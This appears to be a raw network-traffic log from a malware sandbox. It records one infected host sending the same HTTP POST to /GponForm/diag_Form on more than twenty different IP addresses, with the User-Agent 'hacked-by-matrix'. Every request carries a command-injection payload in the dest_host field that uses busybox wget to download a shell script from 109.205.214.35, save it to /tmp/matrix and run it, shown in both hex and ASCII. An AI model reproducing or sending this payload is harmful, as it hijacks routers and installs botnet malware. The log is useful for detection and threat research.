                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1838192.168.2.1350154212.110.59.147443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821230888 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1839192.168.2.1337174212.212.229.56443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821274042 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1840192.168.2.1358894109.9.215.121443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821285009 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1841192.168.2.1360800118.65.22.233443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821307898 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1842192.168.2.1355256212.149.26.29443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821309090 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1843192.168.2.1360354118.188.23.127443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821332932 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1844192.168.2.13591165.14.41.85443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821338892 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1845192.168.2.1356610109.197.146.123443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821393013 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1846192.168.2.13385105.17.129.84443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821418047 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1847192.168.2.1334768118.136.117.54443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821424007 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1848192.168.2.1349768118.167.10.110443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821471930 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1849192.168.2.1347044109.12.106.209443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821527004 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1850192.168.2.1358592118.248.220.33443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821537018 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1851192.168.2.1337590212.28.79.230443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821559906 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1852192.168.2.1350726212.132.230.59443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821566105 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1853192.168.2.1354272212.162.165.210443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821588039 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1854192.168.2.1357084118.54.199.164443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821624041 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1855192.168.2.13574425.120.231.159443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821639061 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1856192.168.2.1353610118.210.103.68443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821652889 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1857192.168.2.135054442.109.83.182443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821675062 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1858192.168.2.135353442.187.33.47443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821676970 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1859192.168.2.134509242.212.142.61443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821703911 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1860192.168.2.1334008212.174.111.175443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.821743965 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
